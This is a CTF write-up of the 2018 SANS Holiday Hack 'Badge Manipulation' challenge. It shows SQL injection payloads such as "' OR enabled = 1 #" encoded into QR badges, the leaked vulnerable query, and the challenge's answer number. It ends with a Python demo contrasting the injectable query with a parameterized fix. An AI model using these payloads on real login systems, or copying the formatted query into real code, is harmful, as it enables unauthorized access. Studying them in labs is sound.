Salaheldin

March 14, 2019

Badge Manipulation

Main Challenge @ The 2018 SANS Holiday Hack Challenge [ Kringlecon ]

CTF Writeup

📍 On the 2nd floor, from Pepper Minstix go to the end of the corridor, then turn left until you reach the door on your right.



1- Following the OWASP website on how to bypass panels, let's try some code variations:

or 1-- -'

2- Let's create the QR barcode badge:


3- Go to the authentication panel, click the USB port, and upload the created QR PNG file:

> If you get the error message "resource_id not set in cookie", try logging in from a different browser where third-party cookies are enabled.

After you upload the badge PNG file, you will get this error message:


To view the full message, use the following method:

  • In Firefox: right-click > Inspect Element > Network tab > reload button
  • Then upload the QR file again
  • Select the last loaded item > select Response in the right panel

EXCEPTION AT (LINE 96 "user_info = query("SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = '{}' LIMIT 1".format(uid))"): (1064, u"You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''or 1-- -'' LIMIT 1' at line 1")

4- This error message gives us the query used to validate the badge:

SELECT first_name,last_name,enabled FROM employees WHERE authorized = 1 AND uid = '{}' LIMIT 1

Here uid is our badge code, and enabled and authorized are the interesting columns.

5- Let's reshape our code and regenerate our QR badge:

' OR 1 = 1 #

We use OR to select authorized accounts regardless of the uid, and a # at the end to comment out the rest of the query, because we need to ignore the formatting around uid.

As you can see, we get the following error message:

Authorized User Account Has Been Disabled!


6- Let's reshape our code again and regenerate our QR badge:

' OR enabled = 1 #

We use OR to select enabled accounts regardless of the uid or of whether the account is authorized.

We will also try enabled with 1 and then true to test the values.


Successfully opened the door and also got the access control number :

User Access Granted - Control number 198807


📟 Go to your Badge > Objectives > Enter 19880715
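
The query disclosed by the error message, shown beside a parameterized form of the same lookup. This is an added example, not part of the original writeup or the challenge's own code. It assumes an in-memory SQLite table with constructed rows in place of the MariaDB backend, maps the MariaDB # comment to SQLite's -- so the badge strings from steps 1, 5 and 6 parse the same way, and uses hypothetical function names.

```python
import sqlite3

# Query text as disclosed by the error message (line 96 of the badge scanner).
QUERY = ("SELECT first_name,last_name,enabled FROM employees "
         "WHERE authorized = 1 AND uid = '{}' LIMIT 1")
SAFE_QUERY = QUERY.replace("'{}'", "?")  # same query, uid as a bound parameter


def make_db():
    """In-memory stand-in for the employees table; every row is constructed."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE employees (first_name TEXT, last_name TEXT, "
               "enabled INTEGER, authorized INTEGER, uid TEXT)")
    db.executemany("INSERT INTO employees VALUES (?,?,?,?,?)", [
        ("Disabled", "Admin", 0, 1, "uid-0001"),  # authorized, not enabled
        ("Enabled", "Guest", 1, 0, "uid-0002"),   # enabled, not authorized
    ])
    return db


def lookup_vulnerable(db, uid):
    """Builds the SQL with str.format, as the disclosed line 96 does."""
    sql = QUERY.format(uid)
    # Assumption for this sketch: SQLite has no '#' comment, so map it to '--'
    # to reproduce how MariaDB would parse the statement.
    return db.execute(sql.replace("#", "--")).fetchone()


def lookup_safe(db, uid):
    """Binds uid as data; quotes and comment markers never reach the parser."""
    return db.execute(SAFE_QUERY, (uid,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # Badge strings taken from the writeup, plus one legitimate constructed uid.
    for badge in ["uid-0001", "' OR 1 = 1 #", "' OR enabled = 1 #"]:
        print(repr(badge), lookup_vulnerable(db, badge), lookup_safe(db, badge))
```

With the formatted query, the step 5 string matches every row and returns whichever comes first, here a disabled account, while the step 6 string returns the enabled but unauthorized one. With the bound parameter both strings are compared as literal uid values and return no row.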